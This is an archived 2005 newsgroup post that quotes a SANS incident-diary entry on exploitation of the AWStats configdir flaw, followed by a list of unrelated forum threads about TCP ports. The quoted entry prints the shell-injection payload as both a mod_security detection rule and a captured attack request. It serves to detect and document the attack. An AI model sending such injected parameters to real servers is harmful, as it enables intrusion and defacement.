AWStats Exploits, Port 7162/TCP and 24212/TCP traffic, spamvertised site redirected to Al'Jazeera

AWStats Exploits, Port 7162/TCP and 24212/TCP traffic, spamvertised
site redirected to Al'Jazeera 
http://isc.sans.org/diary.php?date=2005-01-31 

***********************************************************
Quote
***********************************************************
AWStats Exploits

A couple days ago, an advisory (e.g. see Securiteam) detailed a
vulnerability in the popular web statistics package 'AWStats'. 

We got a note from Ryan Barnet earlier, who detected an exploit
attempt for this vulnerability. The traffic was flagged using
mod_security. 

The following mod_security rule was used to detect the attempt:

/awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|?confi
gdi r=|echo%20;echo%20;id;echo%20;echo|

Another reader reported an incident where this attack was succesful.
The attacker defaced the respective website by replacing various
'index' files. (index.htm, index.html, index.php). The web hosting
company attacked informed its clients. 

And the captured request data (I removed some lines that may reveal
too much about the attacked system): 

HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
 application/vnd.ms-powerpoint, application/vnd.ms-excel,
 application/msword, */* 
HTTP_ACCEPT_LANGUAGE = en-us
HTTP_HOST = www.foo.com
HTTP_MOD_SECURITY_ACTION = 403
HTTP_MOD_SECURITY_MESSAGE = Access denied with code 403. Pattern
match "\;id" at THE_REQUEST HTTP_USER_AGENT = Mozilla/4.0
(compatible; MSIE 6.0b; Windows NT 5.0) PATH = /usr/sbin:/usr/bin
QUERY_STRING = 
REDIRECT_QUERY_STRING =
configdir=|echo%20;echo%20;id;echo%20;echo|?configdir=|echo%20;echo%2
0;id; 
   echo%20;echo|
REDIRECT_REQUEST_METHOD = GET
REDIRECT_SCRIPT_URI =http://www.foo.com/awstats/awstats.pl
REDIRECT_SCRIPT_URL = /awstats/awstats.pl
REDIRECT_STATUS = 403
REDIRECT_URL = /awstats/awstats.pl
REDIRECT_mod_security_relevant = 1
REMOTE_ADDR = 200.203.166.61
REMOTE_PORT = 33165
REQUEST_METHOD = GET
REQUEST_URI =
/awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| 
     ?configdir=|echo%20;echo%20;id;echo%20;echo|
SCRIPT_NAME = /cgi-bin/403.cgi
SCRIPT_URI =http://www.foo.com/awstats/awstats.pl
SCRIPT_URL = /awstats/awstats.pl
SERVER_ADDR = 192.168.1.100
SERVER_ADMIN = webmaster@foo.com
SERVER_NAME = www.foo.com
SERVER_PORT = 80
SERVER_PROTOCOL = HTTP/1.0
SERVER_SIGNATURE = 
TZ = US/Eastern


[...]

http://isc.sans.org/diary.php?date=2005-01-31

***********************************************************
Unquote
***********************************************************

-- 
Kayode Okeyode
http://del.icio.us/kayodeok
http://www.kayodeok.co.uk/weblog/
0
kayodeok
1/31/2005 8:08:57 PM
grc.security 16608 articles. 3 followers. Follow

0 Replies
7393 Views

Similar Articles

[PageSpeed] 43

Reply:

Similar Artilces:

GWIA
We are running Groupwise 6.0. What is the default TCP port for the GWIA under GroupWise tab, Identification, TCP/IP address, TCP port? Thanks for any hints... Huong > We are running Groupwise 6.0. What is the default TCP port for the GWIA > under GroupWise tab, Identification, TCP/IP address, TCP port? > Thanks for any hints... > Huong > The default port is 1677. The TCP/IP address is the address of the machine that is running GWIA. So, it is the same as the POA default TCP port. Thanks, I will test it out. Huong > > We are running Groupwise 6.0. ...

TCP port 3456 - Terror Trojan AND something called 'VAT default data'
23 February - one helluva lot of activity on TCP3456 - in 45 mins today has become the highest scoring day in terms of hits per second on my system (and I'm including that OSPF routing thing from a last November, which ran steadily at 720 per hour). This time I had 42 sources and *each* hit me over 100 times... 3456/TCP is Terror Trojan, isn't it? Also "VAT default data" - in the UK, VAT is a sales tax - what's it in computing? I guess it's a legit service of some sort. Now, using sites like http://lists.gpick.com/pages.asp?page=Port_Lists and http://w...

TCP port 53 traffic?
Hello I'm just seeing on my router logs TCP port 53 from one of the root DNS servers.. denied tcp 192.175.48.1(53) -> 202.x.x.x(2793), 10 packets Seems to be anywhere between 10 and 2 packets each time, pretty frequently. Just seems a little odd, we are running a DNS server that's NAT'd for internal use so i suppose it could be that?.. but I'd thought all DNS traffic was UDP? Scott Paterson wrote: > > ...but I'd thought all DNS > traffic was UDP? Apparently not: domain 53/tcp Domain Name Server domain 53/udp ...

Opening tcp ports for RDC's on multiple PC's behind hardware firewall
Hello! This post is more of a confirmation that I understand things post .... Environment in this scenario .... o Hardware firewall homing a static public IP.against what is baiscally a peer to peer network. o Behind the firewall are XP workstations that are desired to be used as Remote Desktop Clients. o In this scenario, I have changed the listening port (search MS base for change listening port) these clients listen on to 3388, 3387 3386 and so on down the line. o The clients then get a dhcp reservation set so as the local IP is always constant. o I then add p...

When loading gmail must always "reload" once unless using the secure loading site. When using the secure loading site loading takes four times as long. So I don't use the secure loading site, I just
Name: Dwight Metcalfe Email: dwmet1atgmaildotco Product: Firefox Summary: When loading gmail must always "reload" once unless using the secure loading site. When using the secure loading site loading takes four times as long. So I don't use the secure loading site, I just "reload" the other site once automatically just to save time. Hmmmmmmmm. Comments: Only been doing that about a month. Browser Details: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3 From URL: http://hendrix.mozilla.org/ Note to reade...

What's up with TCP port 2234?
Looking at my firewall log yesterday it was almost competely full with blocks of TCP port 2234, when I looked just now it was full, in fact it is full with entries from only the last 13 minutes (approximately 350-400 entries). A quick search on the Internet only mentioned some online games that uses this port. The link below to Sans' InternetStormCenter also shows a recent increase in traffic to this port. http://isc.sans.org/port_details.html?port=2234 The number of reports also show it as the second on the trends page. http://isc.sans.org/trends.html Anyone else out ...

Emsa Port Blocker: TCP blocking utility and TCP Viewer for Windows?
http://www.e-systems.ro/port_blocker.htm This looks like a pretty cool program. It is a tcp viewer and port blocker. However after downloading it and unzipping, when I try and run the program I get a pop up that says something to the effect, "this is the first time running this program please click on the link below to activate". It is a free program so why the activation code? Is there anything fishy with this program? I scanned the zip file with AVG and it came up clean. To be sure, I thought I would run it by the fine folks here to get your opinions before get...

simple tcp socket server:Is it possible, server wait for '!' sign, not '\n'?
Hi all, i need write script to get string like $355632000166323,1,1,040202,093633,E12129.2252,N2459.8891,00161,0.0100,147,07*37! from TCP client. All is fine if client send ENTER after string, but this string have no CR/LF at end. Is it possible, server wait for '!' sign, not '\n'? The code: #!perl use IO::Socket; $PORT = 5001; # pick something not in use $server = IO::Socket::INET->new( Proto => 'tcp', LocalPort => $PORT, Listen => SOMAXCONN, ...

TCP PORT
So you'd think this would be a piece of cake. I use an 8e6 web filtering appliance on my network (netware 6.5 OES). and use their form of web based, JAVA, authentication for my MAC and Linux boxes. Their version of web authentication is identical the the BM SSL method, only the 8e6 method doesn't rely on a simple timeout. Instead, it launches a little JAVA app that logs you in and then checks every minute to ensure you're still logged in and that you are who you say you are. If you were to close the JAVA app, you would be forced (THEN AND ONLY THEN) to re-authen...

tli/tcp vs. tcp
What's the basic difference between tli/tcp vs. plain tcp ? From what I have read, tli is "outdated". Jesus M. Salvo Jr. wrote: > > What's the basic difference between tli/tcp vs. plain tcp ? > From what I have read, tli is "outdated". > I guess an additional question is: What effect does the above setting ( whether ASE uses tli/tcp or tcp ) on ASE clients ... in particular: isql and JDBC JConnect ? ...

TCP port
The disply below ( netstat -na) shows a "service" Listening on port 139. How can uninstall it ? TCP 0.0.0.0:1030 0.0.0.0:0 LISTENING TCP 80.180.170.237:139 0.0.0.0:0 LISTENING TCP 127.0.0.1:1029 0.0.0.0:0 LISTENING UDP 80.180.170.237:137 *:* UDP 80.180.170.237:138 *:* Thank a lot. >The disply below ( netstat -na) shows a "service" Listening on port 139. >How can uninstall it ? That depends on several factors. What is your operating system? How do you connect to the inter...

Bad Protocol 'tcp'
I'm attemping to use LWP from my ISP that uses CPanel 5.0 and virtual hosting. When I try to use any LWP functions they all fail with the error: 500 Can't connect to www.somewhere.com:80 (Bad protocol 'tcp') I can use my simple test script from other hosted domains using CPanel 5.0 What does this mean? What is wrong with my ISPs server? He says he doesn't have a clue. perldiver.pl reports: Perl Executable: /usr/bin/perl Perl Version: 5.006001 PERL compile version OS: linux GID: (If not blank, you are on a machine that supports membership in mu...

TCP Port
What port does Sybase 5.5 use by default. Is it 1433. Thanks Close, it is 1498. Look in the documentation for ServerPort... Network Guide CHAPTER 5. SQL Anywhere Components Network communications parameters ServerPORT parameter /ck "Nathaniel Ggrayson" <ngrayson@oxford-bank.com> wrote in message news:CFT1nyo2BHA.216@forums.sybase.com... > What port does Sybase 5.5 use by default. Is it 1433. > > Thanks > > ...

c2s VPN Traffic Rules using TCP ports over 1023
Hi Is there any way to restrict TCP ports over the 1023 limit when configuring Client to Site VPN Traffic Rules? Thanks John In article <Uzuad.5077$Bo1.936@prv-forum2.provo.novell.com>, wrote: > Is there any way to restrict TCP ports over the 1023 limit when > configuring Client to Site VPN Traffic Rules? > Yes. But you are limited to 4 digits when configuring TCP protocol traffic rules. Craig Johnson Novell Support Connection SysOp *** For a current patch list, tips, handy files and books on BorderManager, go to http://www.craigjconsulting.com ***...

Web resources about - AWStats Exploits, Port 7162/TCP and 24212/TCP traffic, spamvertised site redirected to Al'Jazeera - grc.security

Resources last updated: 2/4/2016 7:09:18 AM